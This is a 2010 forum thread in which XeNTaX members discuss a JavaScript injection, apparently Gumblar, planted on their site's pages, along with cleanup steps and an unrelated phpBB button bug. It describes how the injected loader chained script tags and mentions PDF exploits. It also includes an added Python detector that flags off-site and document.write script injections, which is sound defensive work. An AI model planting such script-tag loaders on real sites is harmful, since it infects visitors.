Re: XeNTaX attacked by virus

Posted: Sun Aug 29, 2010 5:12 pm
by Mr.Mouse
Yes. We will try to get everything back in. For now, new registrations have been disabled.

Re: XeNTaX attacked by virus

Posted: Mon Aug 30, 2010 2:55 am
by Dinoguy1000
XpoZed wrote: I don't think there was a virus that is downloaded on your PC. It's more likely a session/cookie stealer or something.
Anyway, if someone can provide me with a sample (exe, dll, ocx, sys, etc.), I'll be happy to reverse engineer it (that's my main hobby these days ;)).
It was almost certainly Gumblar, based on de-obfuscating the obfuscated JavaScript which was inserted on numerous pages. Maybe not a virus, true, but still some type of malware.

It's worth noting that people with properly-upgraded Windows systems and Acrobat/Flash installations may not have had anything to worry about, but you should still run a virus scan just in case (this is one of the basic maintenance tasks you should be regularly running anyways).

One last note, we don't load any scripts, images, or other resources from external URLs (to the best of my knowledge; there may be a couple of images on the wiki loaded from Wikimedia Commons), so you should be able to safely block any such resources from loading.

Re: XeNTaX attacked by virus

Posted: Mon Aug 30, 2010 6:38 am
by Mr.Mouse
chrrox wrote: I'm using Firefox. It's only the mark forum read that does not work for me; I can go into any thread and the mark read works.
Hmm. http://www.phpbb-seo.com/en/phpbb-forum ... e3678.html This seems to be a phpBB issue.

Re: XeNTaX attacked by virus

Posted: Mon Aug 30, 2010 4:45 pm
by DMorrone
Mr.Mouse wrote:
chrrox wrote: I'm using Firefox. It's only the mark forum read that does not work for me; I can go into any thread and the mark read works.
Hmm. http://www.phpbb-seo.com/en/phpbb-forum ... e3678.html This seems to be a phpBB issue.
Looking at it again, it's an issue back in 2008, so I'm not sure how relevant it is now. Working in Chrome, the button functions as desired. We're still looking into it.

Re: XeNTaX attacked by virus

Posted: Mon Aug 30, 2010 6:00 pm
by Captain
DMorrone wrote: Working in Chrome, the button functions as desired. We're still looking into it.
The button works in the subsections, like here, but doesn't work on the main forum index. I'm pretty sure it's not a browser issue. Tried it myself on Chrome, same result as in Firefox.

Re: XeNTaX attacked by virus

Posted: Mon Aug 30, 2010 7:16 pm
by DMorrone
Craptain wrote:
DMorrone wrote: Working in Chrome, the button functions as desired. We're still looking into it.
The button works in the subsections, like here, but doesn't work on the main forum index. I'm pretty sure it's not a browser issue. Tried it myself on Chrome, same result as in Firefox.
Looks like there is a very recent debate as to how this button should ultimately function:

http://www.phpbb.com/community/viewtopi ... &t=2101636

Re: XeNTaX attacked by virus

Posted: Tue Aug 31, 2010 6:24 pm
by Polefish
Damn, I was fucked hard by this virus. Wasn't able to work for 2 days because of this shit.

Re: XeNTaX attacked by virus

Posted: Tue Aug 31, 2010 6:29 pm
by XpoZed
Can anyone send me the virus? The infected PDF or something will be fine too.

Re: XeNTaX attacked by virus

Posted: Tue Aug 31, 2010 6:39 pm
by Mr.Mouse
XpoZed wrote: Can anyone send me the virus? The infected PDF or something will be fine too.
Turns out our computers were clean, or at least a multitude of scanners found nothing.

But whatever it was and where it came from, it injected the site's pages with this:

Re: XeNTaX attacked by virus

Posted: Tue Aug 31, 2010 6:55 pm
by Rheini
I didn't notice anything? What happens if you visit a site that's infected with it?
And what about the PDF etc. stuff? XeNTaX doesn't use anything like Flash, PDF...

Re: XeNTaX attacked by virus

Posted: Tue Aug 31, 2010 7:13 pm
by XpoZed
Mr.Mouse wrote: Turns out our computers were clean, or at least a multitude of scanners found nothing.

But whatever it was and where it came from, it injected the site's pages with this:
Thanks, but I've already got this... it just does a document.write('<script type="text/javascript" src="URL SNIP"> </script>')
Then from URL SNIP we had a similar script that does a document.write with a script again, this time to something like URL SNIP, and there was only a redirect to google.com :?
That's why I've said that this is probably only a logger.

Anyway, if someone got the virus, I'll be happy to play with its bits 'n' bytes. ;)

@Rheini I've seen similar JavaScript exploits like this one that redirect the user to a PDF document with an exploit in it. And if you already have Acrobat Reader installed, and it is exploitable (old version etc.), you get infected.
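
A defender-side check built on two observations from this thread (the injected code was a document.write of a script tag, and the site loads no scripts from external URLs), added here as an example and not code from any poster: it audits a page for script tags pointing off-site and for inline scripts that write further script tags. The host names, the allowlist and the sample page are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads resources from.
ALLOWED_HOSTS = frozenset({"forum.example", "upload.wikimedia.org"})
# document.write(...) whose argument contains an opening <script tag.
DOC_WRITE_SCRIPT = re.compile(r"document\.write(?:ln)?\s*\([^)]*<\s*script", re.I)

class ScriptAudit(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__(convert_charrefs=True)
        self.allowed, self.findings = allowed_hosts, []
        self._body = None  # text chunks collected while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._body = []
        src = dict(attrs).get("src")
        host = urlparse(src).hostname if src else None
        # Relative URLs have no host and stay on the site itself.
        if host and host not in self.allowed:
            self.findings.append(("external-script", src))

    def handle_data(self, data):
        if self._body is not None:
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._body is not None:
            body, self._body = "".join(self._body), None
            if DOC_WRITE_SCRIPT.search(body):
                self.findings.append(("document.write-script", body.strip()[:80]))

def audit_html(text, allowed_hosts=ALLOWED_HOSTS):
    parser = ScriptAudit(allowed_hosts)
    parser.feed(text)
    parser.close()
    return parser.findings

# Constructed sample page: one local script, one injected loader, one off-site tag.
SAMPLE = """<head><script src="/styles/forum.js"></script>
<script type="text/javascript">document.write('<script type="text/javascript" src="http://injected.example/a.js"> </script>')</script>
<script src="//injected.example/b.js"></script></head>"""

if __name__ == "__main__":
    for kind, detail in audit_html(SAMPLE):
        print(kind, detail)
```

Run over every template and cached page in the web root, any finding on a site that serves all of its own scripts is worth comparing against a known-good copy of the file.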

Re: XeNTaX attacked by virus

Posted: Tue Aug 31, 2010 7:29 pm
by Rheini
Thank god I don't have that damn Acrobat Reader installed at all (Foxit <3)
I do have Flash though (with Opera)

Re: XeNTaX attacked by virus

Posted: Wed Sep 01, 2010 9:57 pm
by Mr.Mouse
Registrations are back on.

Re: XeNTaX attacked by virus

Posted: Wed Sep 01, 2010 10:30 pm
by Dinoguy1000
Awesome! :mrgreen: *registers 839583 dummy accounts* :]

Re: XeNTaX attacked by virus

Posted: Fri Sep 10, 2010 9:41 pm
by Zerox
While attempting to go to the page to download Noesis I got this while using Firefox:

Image

This is the link I followed: http://oasis.xentax.com/index.php?content=downloads

Edit: I see it was already reported in his Noesis thread. My apologies.